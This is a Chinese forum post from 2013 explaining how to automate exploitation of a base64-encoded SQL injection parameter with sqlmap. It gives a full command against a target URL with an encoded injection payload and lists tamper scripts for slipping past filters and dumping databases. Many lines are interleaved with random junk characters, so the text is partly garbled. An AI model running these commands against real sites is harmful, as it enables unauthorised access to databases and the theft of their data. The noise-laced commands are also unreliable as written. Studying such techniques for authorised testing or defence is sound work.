WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
7 X, Y0 _) ?) _" @% K7 ]0 b
1 x4 j4 @. z" F+ x: [ `4 Ysqlmap的tamper里有个base64encode.py9 U4 \& J G2 U3 [, S+ y
# [8 z+ N0 T' I
使用如下
8 L- u. a* J- `% T, S+ |+ ~( |1 x) S
/ ?1 [: m4 w/ @& t- g D, `sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs3 b" w5 S8 u4 L* q5 e' I. b: O: h
4 B+ m' B8 t4 `5 O, v( S
. N7 u2 X: W$ T( L9 U, d) v
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
8 ^- W( o& b" n* z5 Z* x# U( u3 U& N4 T. \! v
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:9 x$ p) @, P; f% Y- i! F
& _7 `2 ]3 P( ^/ ]4 x
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
* C. Y$ S5 y3 E/ l: q; I7 s6 l) vspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入) o/ r2 |. Q8 M. M
首先确定目标数据库版本,然后选择相应的脚本。
9 G! A0 L: E; |-v 3 --batch --tamper "space2hash.py"$ C5 O, A3 L; D5 _
7 e0 M: i- J' g6 k还有其他一些插件:% R) u6 |- d4 o1 L
encodes编码 ——charencode.py8 S1 [3 I; R9 K
base64编码 —— base64encode.py
; A& z+ S W- R. O3 x替换空格和关键字 —— halfversionedmorekeywords.py* b3 R4 {7 ]7 r- e! B
|
# [) v2 w2 i1 b' Y, E
5 Q c7 i. z9 A. H+ E
0 ^' j, V! f @. R2 g9 B, V2 O. m3 F, k5 s$ x4 `/ @8 t' q- @+ H2 x
|
发表于 2013-11-23 15:50:45
收藏
支持
反对